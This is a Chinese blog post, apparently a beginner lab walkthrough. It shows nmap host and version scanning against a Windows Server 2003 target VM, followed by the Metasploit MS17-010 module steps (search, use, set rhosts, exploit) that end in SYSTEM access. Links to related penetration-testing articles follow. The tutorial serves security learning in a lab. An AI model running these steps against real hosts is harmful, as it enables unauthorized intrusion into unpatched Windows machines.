主机 渗透

已于 2024-03-14 20:13:20 修改
阅读量410 收藏 12
点赞数 9
分类专栏: kali 文章标签: 安全 web安全 网络
于 2024-03-14 20:01:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lin__ying/article/details/136690005
版权

1:kali

靶机:Windows Server 2003

端口扫描

1.用nmap端口扫描靶机

nmap -sP 192.168.157.0/24   #扫描192.168.157.0这个网段存活的主机

靶机的IP为192.168.157.130

2

nmap -sV192.168.157.130 -p-   #-sV 参数用于启用版本检测,192.168.157.130 是目标主机的IP地址,-p- 参数用于扫描所有端口

msfconsole

1. ms17_101  

search ms17_010  #询问有关"ms17_010"的漏洞信息

2.use

use 1 #利用1这个模块

3.options

show options   #列出模块所需的各种参数

4.set

set rhosts 192.168.157.130         # 设置远程目标主机的IP地址为192.168.157.130

5.exploit

exploit   #执行攻击

6.获得system32,Windows最高权限

lin___ying
关注
  • 9
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
一次完整的渗透流程
m0_69408815的博客
05-29 1127
一次完整的渗透 攻击机:linux2021 靶机:windows server 2008 R2 文章目录一次完整的渗透攻击机:linux2021 靶机:windows server 2008 R2一、主机发现模块二、 靶机信息收集使用nmap -sV 192.168.93.129三、漏洞利用 ms17-0101.启动msfconsole2.搜索ms17-010漏洞3.利用漏洞4.运行漏洞 一、主机发现模块 nmap,fping,netdiscover都是很好用的扫描存货靶机的工具 nmap扫描存活靶机用
DAY27:主机渗透测试
qq_49433473的博客
08-10 2605
主机渗透测试、主机渗透常用端口、服务默认端口及爆破使用、主机渗透漏洞实例利用 向日葵rce示例,redis弱口令爆破及getshell
渗透入门:DC-1主机渗透详细教学
2301_77472496的博客
09-19 1119
DC系列靶场是一组专门为渗透测试而设计的易受攻击的实验室,共有九个靶场。它的目的是让初学者获得渗透测试领域的经验,但是它的难度取决于你的技能和知识,以及你的学习能力。
2024年最全自动化主机渗透工具_shennina,写给正在求职的网络安全开发
最新发布
2401_84239830的博客
05-06 821
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
一套完整的渗透测试流程,值得阅读分享
m0_58477260的博客
03-03 1516
首先客户需要先授权委托,并同意实施方案是进行渗透测试的必要条件。渗透测试首先必须将实施方法、实施时间、实施人员,实施工具等具体的实施方案提交给客户,并得到客户的相应书面委托和授权。应该做到客户对渗透测试所有细节和风险的知晓、所有过程都在客户的控制下进行。信息收集是每一步渗透攻击的前提,通过信息收集可以有针对性地制定模拟攻击测试计划,提高模拟攻击的成功率,同时可以有效的降低攻击测试对系统正常运行造成的不利影响。
渗透测试简述
2201_75362610的博客
03-11 703
渗透测试 (penetration test)并没有一个标准的定义,国外一些安全组织达成共识的通用说法是:渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法。渗透测试是根据已知可利用的安全漏洞,去发现是否存在相应的信息资产,通常评估方法对评估结果更具有全面性,渗透测试则更注重安全漏洞的严重性。渗透测试完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节,能直观的让管理员知道自己网络所面临的问题。所以渗透测试是安全评估的方法之一。
渗透.pdf
08-23
5. **net use \\ip\ipc$ password /user:username** - 用于与远程主机建立IPC会话。 6. **net share** - 列出本机上共享的资源。 7. **net view** - 查询同一域内的计算机列表。 8. **net start** - 显示正在运行的...
Linux 主机超全渗透测试命令汇总
02-12
Linux 主机超全渗透测试命令汇总Linux 主机超全渗透测试命令汇总Linux 主机超全渗透测试命令汇总
Linux渗透教程
11-18
Linux渗透测试是一种安全评估方法,用于检测系统的安全性,找出潜在的漏洞,并采取措施进行修复。在本教程中,我们将深入探讨Linux渗透的基本原理,并通过实际案例来帮助理解这一过程。 首先,我们需要理解渗透测试...
dc-9主机渗透
w1157673482的博客
02-28 4261
DC-9主机渗透测试
新手如何入门黑客技术,黑客技术入门该学什么?
Karka_的博客
10-11 108
你是否曾经也对黑客技术感兴趣呢?感觉成为黑客是一件很酷的事,那么作为新手如何入门黑客技术,黑客技术入门该学什么呢?其实不管你想在哪个新的领域里有所收获,你需要考虑以下几个问题首先你要想明白为什么学这个,不管是爱好也好,想要把他作为职业也好,只有清楚了自己的目的后才可以持之以恒的去学习,因为计算机领域要学的知识是非常多的,没有长久的坚持是没办法学会的。
0x02 内网渗透
weixin_43263566的博客
05-10 419
0x02 内网渗透
手把手教你如何进行内网渗透
热门推荐
iO快到碗里来
11-19 8万+
0x00 Preface 内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。 内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。 0x01 信息收集 systeminfo 查看系统详细信息,如OS版本、补丁安装情况,可以根据这些信息筛选可利用的漏洞。 net start 查看启动进
内网渗透-Linux内网渗透
lza20001103的博客
04-14 1654
内网渗透-Linux内网渗透
红队靶场内网渗透(从DMZ主机渗透到域内机器)
m0_65712192的博客
02-12 3714
红队靶场内网渗透(从DMZ主机渗透到域内机器)
DC-5主机渗透
weixin_65920814的博客
05-25 208
本文详细介绍DC-5主机渗透测试的全部内容
内网安全---边界主机渗透
gental_z的博客
01-22 1111
一、简单环境搭建 一台VPS,一台边界服务器OWASP,一台内部服务器Ubuntu Server 网络拓扑如图所示: 关于环境的部署,在OWSAP服务器中设置两张网卡,一张设置外部IP,另外一张设置内部IP。 # 具体配置在/etc/network/interface # 这里设置静态IP auto eth0 iface eth0 inet static address 192.168.101.100 netmask 255.255.255.0 gateway 192.168.101.2 auto et
Metasploit渗透测试实战指南
在情报搜集部分,读者会了解到如何收集目标网络的信息,包括主机发现、端口扫描、服务识别等,这些都是渗透测试的第一步。威胁建模则教导读者如何理解并预测可能的攻击场景,以便制定合适的测试策略。 在漏洞分析...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

lin___ying

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值